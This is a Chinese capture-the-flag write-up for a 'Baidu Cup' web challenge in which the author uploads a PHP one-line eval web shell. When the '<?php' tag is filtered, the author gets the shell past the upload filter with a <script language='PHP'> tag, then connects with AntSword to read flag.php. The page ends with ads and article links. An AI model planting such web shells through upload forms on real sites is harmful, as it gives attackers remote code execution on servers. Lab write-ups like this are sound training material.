“百度杯”CTF比赛 九月场-Upload
1.ISC2016训练赛-phrackCTF-FindKey2.第三届上海市大学生网络安全大赛-crackme3.2017年全国大学生信息安全竞赛-填数游戏4.“百度杯”CTF比赛 2017 二月场-爆破-15.“百度杯”CTF比赛 2017 二月场-爆破-26.ISC2016训练赛-phrackCTF-Smali
7.“百度杯”CTF比赛 九月场-Upload
8.“百度杯”CTF比赛 九月场-SQL9.《从0到1:CTFer成长之路》题目-SQL注入-210.“百度杯”CTF比赛 九月场-SQLi11.“百度杯”CTF比赛 2017 二月场-爆破-312.2017第二届广东省强网杯线上赛- who are you13.i春秋 第二届春秋欢乐赛-Hello-World14.“百度杯”CTF比赛 十月场-Login15.“百度杯”CTF比赛 九月场-123“百度杯”CTF比赛 九月场
Upload:
类型:web
题目描述:想怎么传就怎么传,就是这么任性。tips:flag在flag.php中
解题方法:打开靶机,获得题目链接是一个文件上传类型的:
看到文件上传,就想到一句话木马,先上传一个一句话木马上去:
<?php @eval ($_POST["1"]);?>
上传成功,我们点击这个上传成功的链接:
这里发现我们的<?php
被过滤了,所以我们要用其他的php标记手法:
<script language="PHP">
@eval($_POST["pass"]);//php长标签
</script>
然后现在我们再上传我们的一句话木马
上传成功后再点击上传成功的链接,返回的是一片空白,说明我们的一句话木马上传成功了
现在用中国蚁剑来连:
连接成功!
在目录下找到flag.php
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 无需6万激活码!GitHub神秘组织3小时极速复刻Manus,手把手教你使用OpenManus搭建本
· Manus爆火,是硬核还是营销?
· 终于写完轮子一部分:tcp代理 了,记录一下
· 别再用vector<bool>了!Google高级工程师:这可能是STL最大的设计失误
· 单元测试从入门到精通